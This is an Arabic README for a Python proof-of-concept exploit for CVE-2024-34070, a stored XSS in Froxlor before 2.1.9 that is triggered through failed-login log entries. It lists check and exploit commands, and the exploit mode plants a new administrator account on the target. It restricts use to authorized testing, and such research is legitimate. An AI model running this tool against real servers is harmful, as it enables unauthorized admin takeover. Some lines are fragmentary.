
نموذج إثبات مفهوم (PoC) بلغة بايثون لثغرة CVE-2024-34070، وهي مشكلة XSS مخزّنة في إصدارات Froxlor قبل 2.1.9 تظهر عبر محاولات تسجيل دخول فاشلة تُكتب في سجل النظام.
هذا المشروع مخصّص لاختبارات الأمان المصرّح بها، ومختبرات CTF، والاستخدام التعليمي فقط. لا تشغّله ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. يمكن لوضع الاستغلال إنشاء حساب مسؤول على مثيل Froxlor المستهدف.
< 2.1.9).الكشف دون مصادقة:
python3 main.py --url http://240.0.0.1:8080 --check
الكشف مع المصادقة، ويُستخدم للحصول على إصدار Froxlor الدقيق:
python3 main.py --url http://240.0.0.1:8080 --check --login admin --password 'password'
وضع الاستغلال، إنشاء مسؤول جديد:
python3 main.py --url http://240.0.0.1:8080 --exploit \
--new-admin abcd \
--new-password 'Abcd@@1234' \
--new-email [email protected]
إذا قرأ مسؤول أو بوت آلي سجلات نظام Froxlor، فمن المفترض أن تعيد خطوة التحقق التوجيه في النهاية إلى admin_index.php.
--check تأكيد وجود Froxlor، لكنه لا يستطيع تحديد قابلية التأثر بالثغرة بشكل قاطع./admin_admins.php) بحيث تعمل مع المثيل المستهدف بدلًا من نطاق مُثبّت في الكود.